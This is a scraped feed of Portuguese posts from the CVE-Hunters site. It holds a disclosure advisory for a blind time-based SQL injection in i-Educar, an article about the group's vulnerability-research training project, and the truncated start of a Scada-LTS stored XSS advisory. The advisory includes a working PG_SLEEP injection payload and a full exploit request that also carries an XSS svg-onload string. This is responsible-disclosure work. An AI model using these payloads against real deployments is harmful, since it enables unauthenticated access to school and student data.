href="https://www.cve.org/CVERecord?id=CVE-2025-9236" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9236</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>nm_tipo</code> do endpoint <code>educar_tipo_usuario_lst.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>nm_tipo</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-9236-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-nm_tipo-do-endpoint-educar_tipo_usuario_lstphp">CVE-2025-9236: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>nm_tipo</code> do Endpoint <code>educar_tipo_usuario_lst.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9236" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9236</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>nm_tipo</code> do endpoint <code>educar_tipo_usuario_lst.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>nm_tipo</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>educar_tipo_usuario_lst.php</code></p> <p>Parâmetro: <code>nm_tipo</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">' AND 8767=(SELECT 8767 FROM PG_SLEEP(10)) OR 'EgwO'='pMdZ </span></span></code></pre></td></tr></table> </div> </div><h4 id="examplo-de-requisição">Examplo de Requisição </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="n">GET</span> <span class="o">/</span><span class="n">intranet</span><span class="o">/</span><span class="n">educar_tipo_usuario_lst</span><span class="o">.</span><span class="n">php</span><span class="err">?</span><span class="n">busca</span><span class="o">=</span><span class="n">S</span><span class="o">&</span><span class="n">nm_tipo</span><span class="o">=</span><span class="mi">1</span><span class="s1">'%20AND</span><span class="si">%208767%</span><span class="s1">3D(SELECT</span><span class="si">%208767%</span><span class="s1">20FROM%20PG_SLEEP(10))%20OR%20'</span><span class="n">EgwO</span><span class="s1">'%3D'</span><span class="n">pMdZ</span><span class="o">&</span><span class="n">descricao</span><span class="o">=</span><span class="mi">1</span><span class="o">&</span><span class="n">nivel</span><span class="o">=</span><span class="mi">1</span> <span class="n">HTTP</span><span class="o">/</span><span class="mf">1.1</span> </span></span><span class="line"><span class="cl"><span class="n">Host</span><span class="p">:</span> <span class="n">localhost</span> </span></span><span class="line"><span class="cl"><span class="n">User</span><span class="o">-</span><span class="n">Agent</span><span class="p">:</span> <span class="n">Mozilla</span><span class="o">/</span><span class="mf">5.0</span> <span class="p">(</span><span class="n">X11</span><span class="p">;</span> <span class="n">Linux</span> <span class="n">x86_64</span><span class="p">;</span> <span class="n">rv</span><span class="p">:</span><span class="mf">128.0</span><span class="p">)</span> <span class="n">Gecko</span><span class="o">/</span><span class="mi">20100101</span> <span class="n">Firefox</span><span class="o">/</span><span class="mf">128.0</span> </span></span><span class="line"><span class="cl"><span class="n">Accept</span><span class="p">:</span> <span class="n">text</span><span class="o">/</span><span class="n">html</span><span class="p">,</span><span class="n">application</span><span class="o">/</span><span class="n">xhtml</span><span class="o">+</span><span class="n">xml</span><span class="p">,</span><span class="n">application</span><span class="o">/</span><span class="n">xml</span><span class="p">;</span><span class="n">q</span><span class="o">=</span><span class="mf">0.9</span><span class="p">,</span><span class="o">*/*</span><span class="p">;</span><span class="n">q</span><span class="o">=</span><span class="mf">0.8</span> </span></span><span class="line"><span class="cl"><span class="n">Accept</span><span class="o">-</span><span class="n">Language</span><span class="p">:</span> <span class="n">en</span><span class="o">-</span><span class="n">US</span><span class="p">,</span><span class="n">en</span><span class="p">;</span><span class="n">q</span><span class="o">=</span><span class="mf">0.5</span> </span></span><span class="line"><span class="cl"><span class="n">Accept</span><span class="o">-</span><span class="n">Encoding</span><span class="p">:</span> <span class="n">gzip</span><span class="p">,</span> <span class="n">deflate</span><span class="p">,</span> <span class="n">br</span><span class="p">,</span> <span class="n">zstd</span> </span></span><span class="line"><span class="cl"><span class="n">Connection</span><span class="p">:</span> <span class="n">keep</span><span class="o">-</span><span class="n">alive</span> </span></span><span class="line"><span class="cl"><span class="n">Referer</span><span class="p">:</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">localhost</span><span class="o">/</span><span class="n">intranet</span><span class="o">/</span><span class="n">educar_tipo_usuario_lst</span><span class="o">.</span><span class="n">php</span><span class="err">?</span><span class="n">busca</span><span class="o">=</span><span class="n">S</span><span class="o">&</span><span class="n">nm_tipo</span><span class="o">=%</span><span class="mi">22</span><span class="o">%</span><span class="mi">3</span><span class="n">E</span><span class="o">%</span><span class="mi">3</span><span class="n">Csvg</span><span class="o">+</span><span class="n">onload</span><span class="o">%</span><span class="mi">3</span><span class="n">Dalert</span><span class="o">%</span><span class="mi">2812</span><span class="o">%</span><span class="mi">29</span><span class="o">%</span><span class="mi">3</span><span class="n">E</span><span class="o">&</span><span class="n">descricao</span><span class="o">=%</span><span class="mi">22</span><span class="o">%</span><span class="mi">3</span><span class="n">E</span><span class="o">%</span><span class="mi">3</span><span class="n">Csvg</span><span class="o">+</span><span class="n">onload</span><span class="o">%</span><span class="mi">3</span><span class="n">Dalert</span><span class="o">%</span><span class="mi">2812</span><span class="o">%</span><span class="mi">29</span><span class="o">%</span><span class="mi">3</span><span class="n">E</span><span class="o">&</span><span class="n">nivel</span><span class="o">=-</span><span class="mi">1</span> </span></span><span class="line"><span class="cl"><span class="n">Cookie</span><span class="p">:</span> <span class="n">grav</span><span class="o">-</span><span class="n">admin</span><span class="o">-</span><span class="n">flexpages</span><span class="o">=</span><span class="n">eyJyb3V0ZSI6Ii9ob21lIiwiZmlsdGVycyI6e319</span><span class="p">;</span> <span class="n">grav</span><span class="o">-</span><span class="n">tabs</span><span class="o">-</span><span class="n">state</span><span class="o">=</span><span class="p">{</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">--</span><span class="n">f0e041eed24f87f2b6b02fd6924d0a08</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">languages</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">-</span><span class="n">flex</span><span class="o">-</span><span class="n">pages</span><span class="o">-</span><span class="n">e838602f51515c83bca06a8ae758ce52</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">security</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">-</span><span class="n">flex</span><span class="o">-</span><span class="n">pages</span><span class="o">-</span><span class="n">b6676b27f5cdf6b6c22f8e18da4259a0</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">advanced</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">-</span><span class="n">flex</span><span class="o">-</span><span class="n">pages</span><span class="o">-</span><span class="n">raw</span><span class="o">-</span><span class="mi">8</span><span class="n">f0a83a672754f7823714134334b1de8</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">content</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">-</span><span class="n">flex</span><span class="o">-</span><span class="n">pages</span><span class="o">-</span><span class="n">dc26c564cb2116d77bda5fff24ba90dc</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">security</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">-</span><span class="n">flex_conf</span><span class="o">-</span><span class="n">user_groups</span><span class="o">-</span><span class="n">accounts</span><span class="o">-</span><span class="mi">02</span><span class="n">f0e9f68f41a0648ed530f80bd72c06</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">cache</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">-</span><span class="n">flex</span><span class="o">-</span><span class="n">pages</span><span class="o">-</span><span class="n">raw</span><span class="o">-</span><span class="mi">9</span><span class="n">a0364b9e99bb480dd25e1f0284c8555</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">content</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">-</span><span class="n">flex</span><span class="o">-</span><span class="n">pages</span><span class="o">-</span><span class="n">e91e6348157868de9dd8b25c81aebfb9</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">security</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">--</span><span class="mi">8</span><span class="n">cc45760590da203c5fc3568ecbabd66</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">routes</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">--</span><span class="mi">7</span><span class="n">a2ac3477f8ad14aa750831441325a16</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">facebook</span><span class="o">%</span><span class="mi">22</span><span class="p">};</span> <span class="n">i_educar_session</span><span class="o">=</span><span class="n">hRnVO9PXmAH7dVAd7DsTeTgExwM6ccdtZZaCcpob</span> </span></span><span class="line"><span class="cl"><span class="n">Upgrade</span><span class="o">-</span><span class="n">Insecure</span><span class="o">-</span><span class="n">Requests</span><span class="p">:</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"><span class="n">Sec</span><span class="o">-</span><span class="n">Fetch</span><span class="o">-</span><span class="n">Dest</span><span class="p">:</span> <span class="n">document</span> </span></span><span class="line"><span class="cl"><span class="n">Sec</span><span class="o">-</span><span class="n">Fetch</span><span class="o">-</span><span class="n">Mode</span><span class="p">:</span> <span class="n">navigate</span> </span></span><span class="line"><span class="cl"><span class="n">Sec</span><span class="o">-</span><span class="n">Fetch</span><span class="o">-</span><span class="n">Site</span><span class="p">:</span> <span class="n">same</span><span class="o">-</span><span class="n">origin</span> </span></span><span class="line"><span class="cl"><span class="n">Sec</span><span class="o">-</span><span class="n">Fetch</span><span class="o">-</span><span class="n">User</span><span class="p">:</span> <span class="err">?</span><span class="mi">1</span> </span></span><span class="line"><span class="cl"><span class="n">Priority</span><span class="p">:</span> <span class="n">u</span><span class="o">=</span><span class="mi">0</span><span class="p">,</span> <span class="n">i</span> </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.</p> <p><img src="/p/cve-2025-9236/image.png" width="1149" height="1030" srcset="/p/cve-2025-9236/image_hu_4ffda49109aad67b.png 480w, /p/cve-2025-9236/image_hu_2bdafcc06acaa448.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="111" data-flex-basis="267px" /></p> <p style="text-align: justify;">Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9236.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9236.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 20 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/articles/cve-hunters---the-journey-of-aspiring-vulnerability-researchers/ https://www.cvehunters.com/pt/articles/cve-hunters---the-journey-of-aspiring-vulnerability-researchers/ <h2 id="introdução">Introdução </h2><p style="text-align: justify;">Na <b><a href="https://defcon.org/html/defcon-33/dc-33-index.html" target="_blank">#DEFCON33</a></b>, uma das conferências de segurança mais prestigiadas do mundo, <b><a href="https://www.linkedin.com/in/nmmorette" target="_blank">Natan Morette</a></b> apresentou o projeto <b><a href="https://www.cvehunters.com/" target="_blank">CVE-Hunters</a></b>, que representa uma mudança fundamental na forma como abordamos a educação em cybersecurity, transformando o dilema clássico da falta de experiência, em uma oportunidade concreta de aprendizado.</br></br>Com 116 CVEs publicados, 170 vulnerabilidades descobertas e 20 membros ativos em menos de um ano, o b><a href="https://www.cvehunters.com/" target="_blank">CVE-Hunters</a></b> é um modelo replicável que está mudando vidas e melhorando a segurança de sistemas usados por milhões de pessoas.</br></br>Durante suas aulas, <b><a href="https://www.linkedin.com/in/nmmorette" target="_blank">Natan</a></b> se deparava constantemente com a mesma pergunta:</p><h2 id="introdução">Introdução </h2><p style="text-align: justify;">Na <b><a href="https://defcon.org/html/defcon-33/dc-33-index.html" target="_blank">#DEFCON33</a></b>, uma das conferências de segurança mais prestigiadas do mundo, <b><a href="https://www.linkedin.com/in/nmmorette" target="_blank">Natan Morette</a></b> apresentou o projeto <b><a href="https://www.cvehunters.com/" target="_blank">CVE-Hunters</a></b>, que representa uma mudança fundamental na forma como abordamos a educação em cybersecurity, transformando o dilema clássico da falta de experiência, em uma oportunidade concreta de aprendizado.</br></br>Com 116 CVEs publicados, 170 vulnerabilidades descobertas e 20 membros ativos em menos de um ano, o b><a href="https://www.cvehunters.com/" target="_blank">CVE-Hunters</a></b> é um modelo replicável que está mudando vidas e melhorando a segurança de sistemas usados por milhões de pessoas.</br></br>Durante suas aulas, <b><a href="https://www.linkedin.com/in/nmmorette" target="_blank">Natan</a></b> se deparava constantemente com a mesma pergunta:</p> <blockquote> <p>“Como obtenho experiência prática em segurança cibernética?”</p> </blockquote> <h2 id="o-problema-da-experiência-em-cibersegurança">O Problema da Experiência em Cibersegurança </h2><p style="text-align: justify;">A resposta incluía duas opções: <ul><li>Participar de CTFs:</li></ul></p> <p style="text-align: justify;">Os CTFs criam um <i>"mindset de competição"</i> diferente do mundo real, focando em resolver desafios artificiais, que não simula a complexidade de sistemas em produção.</p> <p style="text-align: justify;"><ul><li>Estudar para certificações:</li></ul></p> <p style="text-align: justify;">As certificações, por sua vez, são caras e se concentram na teoria, sem aplicação prática imediata.</p> <p style="text-align: justify;">O mercado de trabalho perpetua esse paradoxo. Mesmo vagas <i>"junior"</i> exigem experiência prévia, buscando profissionais com experiência em avaliação de vulnerabilidades, conhecimento prático de divulgação responsável, um portfólio demonstrável de descobertas de segurança e compreensão da relevância para o negócio.</p> <h2 id="a-filosofia-cve-hunters">A Filosofia CVE-Hunters </h2><p>Nasceu da premissa simples:</p> <blockquote> <p><em><strong>“Cansamos de esperar por oportunidades, então criamos as nossas.”</strong></em></p> </blockquote> <p style="text-align: justify;">O diferencial está na seleção de projetos de código aberto, com base em <b>benefícios sociais reais</b>, priorizando projetos utilizados por organizações que atendem populações vulneráveis.</p> <h2 id="1ª-onda--projeto-wegia">1ª Onda – Projeto WeGIA </h2><p style="text-align: justify;">Em novembro de 2024, com apenas três pessoas (<b><a href="https://www.linkedin.com/in/nmmorette" target="_blank">Natan</a></b> e dois estudantes), eles escolheram <b><a href="https://github.com/LabRedesCefetRJ/WeGIA" target="_blank">#WeGIA</a></b> como seu primeiro alvo. <b><a href="https://github.com/LabRedesCefetRJ/WeGIA" target="_blank">WeGIA</a></b> é uma plataforma brasileira de código aberto utilizada por programas sociais e ONGs, incluindo orfanatos, casas de repouso e centros de adoção. A escolha fez sentido: tinha relevância social direta, código acessível, desenvolvedores brasileiros facilitando a comunicação e era um sistema crítico para proteger dados de populações vulneráveis. A 1ª Onda resultou em <b>48 CVEs</b> publicados, com uma distribuição impressionante:</p> <ul> <li>34 Cross-Site Scripting (70,8%);</li> <li>8 SQL Injection (16,7%);</li> <li>2 Broken Access Control (4,2%);</li> <li>1 Remote Code Execution (2,1%);</li> <li>1 Open Redirect (2,1%);</li> <li>1 Denial of Service (2,1%);</li> <li>1 CSRF em ação sensível (2,1%).</li> </ul> <p style="text-align: justify;">Um destaque especial foi <b><a href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank">Elisangela Silva de Mendonça</a></b>, aluna que descobriu sozinha <b>29 dos 48 CVEs (60% do total)</b>. Sua trajetória exemplifica perfeitamente o potencial do projeto: ela começou como iniciante em pesquisa de vulnerabilidades, desenvolveu uma metodologia de análise sistemática, conquistou seu primeiro emprego em cibersegurança e hoje serve como referência para novos membros do grupo.</br></br>Os impactos foram além do número de CVEs publicados, criando ondas de <b>mudança real</b> na comunidade. Os dois primeiros alunos conquistaram seus primeiros empregos em cibersegurança, validando na prática que a experiência adquirida foi reconhecida pelo mercado. Simultaneamente, os desenvolvedores do <b><a href="https://github.com/LabRedesCefetRJ/WeGIA" target="_blank">WeGIA</a></b> não apenas corrigiram as vulnerabilidades descobertas, como também implementaram as <b>melhores práticas de segurança</b> em todo o projeto. O que começou como uma colaboração pontual evoluiu para um relacionamento duradouro, com outros pesquisadores independentes se sentindo inspirados a contribuir para o projeto.</p> <h2 id="2ª-onda--projetos-portabilis">2ª Onda – Projetos Portabilis </h2><p style="text-align: justify;">A validação inicial abriu caminho para uma expansão ambiciosa. Com 10 novos alunos, a equipe identificou seu próximo desafio: <b><a href="https://portabilis.com.br/" target="_blank">#Portabilis</a></b>, uma empresa que desenvolve softwares de código aberto para gestão educacional.</br></br><b><a href="https://github.com/portabilis/i-educar" target="_blank">i-Educar</a></b> representa uma história impressionante em termos de alcance social:</p> <ul> <li>O sistema conecta mais de 80 municípios brasileiros;</li> <li>Gerencia 2.050 escolas;</li> <li>Impacta 500.000 alunos.</li> </ul> <blockquote> <p>Até mesmo a Força Aérea Brasileira o utiliza para simulações críticas.</p> </blockquote> <p style="text-align: justify;">A descoberta da <b><a href="https://www.cve.org/CVERecord?id=CVE-2025-8789" target="_blank">CVE-2025-8789</a></b> ilustra como vulnerabilidades simples podem ter consequências devastadoras.</br>Essa falha permitiu que <b>usuários sem privilégios alterassem as notas dos alunos</b> por meio de chamadas diretas à API. A ironia era cruel: enquanto a interface bloqueava ações não autorizadas, as APIs operavam como portas abertas, validando apenas se o usuário estava logado, ignorando suas permissões específicas. O processo revelou a metodologia sistemática desenvolvida: análise de fluxos limitados, interceptação de solicitações, testes de bypass e confirmação da verdadeira gravidade.</p> <p>Os resultados da 2ª Onda refletem escala e profundidade:</p> <ul> <li>42 vulnerabilidades no <strong><a class="link" href="https://github.com/portabilis/i-educar" target="_blank" rel="noopener" >i-Educar</a></strong>;</li> <li>19 no <strong><a class="link" href="https://github.com/portabilis/i-diario" target="_blank" rel="noopener" >i-Diário</a></strong>;</li> <li>8 CVEs publicados;</li> <li>53 vulnerabilidades no processo de divulgação.</li> </ul> <h2 id="3ª-onda--diversificação-e-maturidade">3ª Onda – Diversificação e Maturidade </h2><p style="text-align: justify;">A 3ª Onda marca uma maturidade notável, gerenciando <b>oito projetos simultâneos</b>, desde a continuidade com <b><a href="https://github.com/LabRedesCefetRJ/WeGIA" target="_blank">WeGIA</a></b> e <b><a href="https://github.com/portabilis/i-educar" target="_blank">i-Educar</a></b> até a diversificação para <b><a href="https://github.com/centreon/centreon" target="_blank">Centreon</a></b>, <b><a href="https://github.com/getgrav/grav" target="_blank">Grav</a></b>, <b><a href="https://github.com/indico/indico" target="_blank">Indico</a></b> e <b><a href="https://github.com/SCADA-LTS/Scada-LTS" target="_blank">Scada-LTS</a></b>. Entre todas as descobertas, o trabalho no <b><a href="https://github.com/SCADA-LTS/Scada-LTS" target="_blank">Scada-LTS</a></b> se destaca como um momento quase cinematográfico. Este sistema, usado pela <b><a href="https://www.itaipu.gov.br/" target="_blank">Usina de Itaipu</a></b> para simular ataques cibernéticos à infraestrutura crítica, revelou duas vulnerabilidades XSS (<b><a href="https://www.cve.org/CVERecord?id=CVE-2025-7728" target="_blank">CVE-2025-7728</a></b> e <b><a href="https://www.cve.org/CVERecord?id=CVE-2025-7729" target="_blank">CVE-2025-7729</a></b>) em <b>menos de um minuto</b>, demonstrando a eficiência refinada da metodologia.</p> <h2 id="metodologia-estruturada">Metodologia Estruturada </h2><p style="text-align: justify;">O processo inclui:<ul><li>Seleção criteriosa (1 a 2 dias) avaliando o impacto social e a capacidade de resposta do mantenedor;</li><li>Reconhecimento aprofundado (3 a 5 dias) mapeando a arquitetura e configurando ambientes;</li><li>Avaliação intensiva de vulnerabilidades (15 a 20 dias) combinando análise estática com testes dinâmicos;</li><li>Desenvolvimento de PoC (2 a 3 dias);</li><li>Divulgação responsável (5 a 10 dias), envolvendo diplomacia cuidadosa.</li></ul></p> <p style="text-align: justify;">O kit de ferramentas evoluiu organicamente: SonarQube e Semgrep para análise estática, Burp Suite e OWASP ZAP para testes dinâmicos e scripts Python personalizados para lacunas específicas. Relatórios via VulnDB, Alertas de Segurança do GitHub e modelos padronizados garantiram consistência e aumentaram as taxas de aceitação.</br></br>Cada onda trouxe desafios únicos. A diversidade tecnológica exigiu expertise especializada em tempo recorde. Os desafios interpessoais, a falta de cooperação entre mantenedores, os tempos de resposta variáveis e os diferentes níveis de maturidade em segurança ensinaram paciência estratégica e gestão de stakeholders. Duas lições se mostraram fundamentais:</p> <p style="text-align: justify;"><ul><li>Documentação detalhada com capturas de tela e uma articulação clara da relevância para o negócio;</li><li>A colaboração amplifica exponencialmente os resultados por meio de revisão por pares e mentoria.</li></ul></p> <h2 id="legado-educacional-e-comunitário">Legado Educacional e Comunitário </h2><p style="text-align: justify;">O legado educacional desenvolveu habilidades técnicas impressionantes, análise sistemática de código, compreensão intuitiva de superfícies de ataque, desenvolvimento de PoCs funcionais e habilidades profissionais, como gerenciamento de múltiplos projetos, relacionamento com stakeholders e documentação profissional. Os resultados validaram a hipótese original: vários membros conseguiram seus primeiros empregos com portfólios demonstráveis e reconhecimento da comunidade por meio de CVEs públicos. A contribuição para a comunidade foi além da correção de vulnerabilidades, estabelecendo práticas de segurança em projetos que antes as ignoravam, inspirando grupos semelhantes e demonstrando a viabilidade de modelos colaborativos. <h2 id="o-futuro-dos-cve-hunters">O Futuro dos CVE-Hunters </h2><p style="text-align: justify;">O futuro inclui:</p> <ul> <li>Expansão por meio de parcerias com Universidades;</li> <li>Um programa formal de mentoria;</li> <li>O desenvolvimento de ferramentas proprietárias.</li> </ul> <p style="text-align: justify;">Para aspirantes a pesquisadores de segurança, as lições são claras:</p> <ul> <li>Foco inicial em um único projeto com impacto mensurável;</li> <li>Dedicação de tempo suficiente, documentação meticulosa;</li> <li>Compromisso inabalável com a divulgação responsável.</li> </ul> <p style="text-align: justify;">Os educadores podem revolucionar o ensino substituindo simulações pelo engajamento com projetos reais. A comunidade de código aberto pode melhorar os resultados estabelecendo canais de relatórios claros e promovendo uma cultura de segurança em primeiro lugar.</p> <h2 id="conclusão">Conclusão </h2><p style="text-align: justify;">O projeto <b><a href="https://www.cvehunters.com/" target="_blank">CVE-Hunters</a></b> democratizou o acesso à expertise em segurança do mundo real, criando um caminho replicável para <b>qualquer pessoa</b> que queira fazer a diferença.</br></br>Os números:</p> <ul> <li>116 CVEs publicados;</li> <li>20 membros ativos;</li> <li>Milhões de usuários impactados!</li> </ul> <p style="text-align: justify;">Quantifique o sucesso, mas o efeito qualitativo é mais significativo:</p> <blockquote> <p><em><strong>Você não precisa esperar por oportunidades quando pode criar as suas.</strong></em></p> </blockquote> <p style="text-align: center;">"Não estávamos apenas procurando bugs, estávamos procurando uma maneira de contribuir."</p> <p style="text-align: justify;">E eles contribuíram profundamente para seus próprios futuros, para a segurança de sistemas que protegem populações vulneráveis e para a próxima geração de pesquisadores de segurança, munidos de um roteiro testado e comprovado para transformar a curiosidade em carreira.</p> <h2 id="referência">Referência </h2><p style="text-align: justify;">Apresentação "From Noobz to Vulnerability Researchers: The Journey of the CVE-Hunters" - DEF CON 33, 2025.</p> <h2 id="autor-da-apresentação">Autor da Apresentação </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <h2 id="artigo-escrito-por">Artigo escrito por </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="colaboradora">Colaboradora </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em>Por: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 20 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9137/ https://www.cvehunters.com/pt/p/cve-2025-9137/ <h2 id="cve-2025-9137-cross-site-scripting-xss-armazenado-no-endpoint-publisher_editshtm-parâmetro-alias">CVE-2025-9137: Cross-Site Scripting (XSS) Armazenado no endpoint <code>publisher_edit.shtm</code> parâmetro <code>alias</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9137" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9137</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>publisher_edit.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>alias</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>publisher_edit.shtm</code></p><h2 id="cve-2025-9137-cross-site-scripting-xss-armazenado-no-endpoint-publisher_editshtm-parâmetro-alias">CVE-2025-9137: Cross-Site Scripting 